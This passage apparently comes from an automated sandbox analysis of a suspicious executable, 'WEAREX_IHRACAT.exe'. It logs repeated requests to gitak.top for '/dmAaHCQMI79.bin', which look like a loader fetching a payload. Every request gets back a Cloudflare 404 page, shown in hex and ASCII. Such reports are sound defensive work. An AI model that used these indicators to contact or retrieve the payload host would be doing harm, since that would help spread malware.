                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:44:52 UTC1369INData Raw: 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65
                        Data Ascii: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fade
                        2024-08-29 10:44:52 UTC918INData Raw: 2d 32 2e 33 35 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68
                        Data Ascii: -2.353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h
                        2024-08-29 10:44:52 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        27192.168.11.2049803172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:45:02 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:45:02 UTC677INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:45:02 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 95
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q5RykvhTjptvCpjS4wBPMhx7sp3%2BIMVVbgt%2BdCZ5ZDBHAQzsmV1mWm%2BfHQUYsE69qHvhdqIMvGmqLPrN6Q39SMHAX1j5kFlAsGbT4Yj4ZUDtLM2umg8S3KmvoWY%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf3030f68c591-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:45:02 UTC692INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:45:02 UTC1369INData Raw: 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e 3b 0a 09 09
                        Data Ascii: margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;
                        2024-08-29 10:45:02 UTC912INData Raw: 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36
                        Data Ascii: 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.6
                        2024-08-29 10:45:02 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        28192.168.11.2049804172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:45:12 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:45:13 UTC678INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:45:13 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 106
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dHBvQLdSwBm9PoKkTUtljEORft8B1GglMqqEBglJjTMkatKnSdWb64zw2yRX6qFMQNH%2F8TYsc7qAPz%2F7OuPcjsXgLOia82dKizi9rdTMsjTqUo9Vd4N94%2FBzd5k%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf344da1e57be-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:45:13 UTC691INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:45:13 UTC1369INData Raw: 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e 3b 0a 09
                        Data Ascii: margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;
                        2024-08-29 10:45:13 UTC913INData Raw: 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e
                        Data Ascii: 3 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.
                        2024-08-29 10:45:13 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        29192.168.11.2049805172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:45:23 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:45:23 UTC672INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:45:23 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 116
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d7ML22O2MaLNZwkcKS5ZwIoNBgQdWjIPbpKa5C656H0VcHLsJ3mDbZ9IEolDUb1noMxr2onIbst3OkbdrzkLScnR1NkvZYlF4EIUcwP99DxRYaoQW70ruzdv2pY%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf38668e43937-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:45:23 UTC697INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:45:23 UTC1369INData Raw: 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e 3b 0a 09 09 09 7d 0a 0a 09
                        Data Ascii: argin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}
                        2024-08-29 10:45:23 UTC907INData Raw: 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20
                        Data Ascii: 15 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0
                        2024-08-29 10:45:23 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        30192.168.11.2049806172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:45:33 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:45:34 UTC676INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:45:34 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 127
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X%2Ft4Tp4q67AjqoGnNYQb3vJ36PjrscP1jipXuXbg4DznR3Hb4YcJ7XJ6OJHXc64pDG09DJPB4mELnEq0%2BEuQhVAsFklDV6mm49lng4PkUvqOGoVLgBwghDiBlnQ%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf3c7ffb620a6-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:45:34 UTC693INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:45:34 UTC1369INData Raw: 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e 3b 0a 09 09 09
                        Data Ascii: margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;
                        2024-08-29 10:45:34 UTC911INData Raw: 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32
                        Data Ascii: 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.62
                        2024-08-29 10:45:34 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        31192.168.11.2049807172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:45:44 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:45:44 UTC686INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:45:44 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 137
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I8mdVRsckUPkt8lQImW1t%2FJNUaQlVWdid47Dt%2B8tQOwfS6LRTGKaX6Jf%2Fwwyu%2FhoOWUjgJQazpjxkQtSARQtuY%2BaOgW%2Bdd0lXnN5SPiV%2F4If74pYAqji2H2U9EA%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf4099fdbc964-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:45:44 UTC683INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
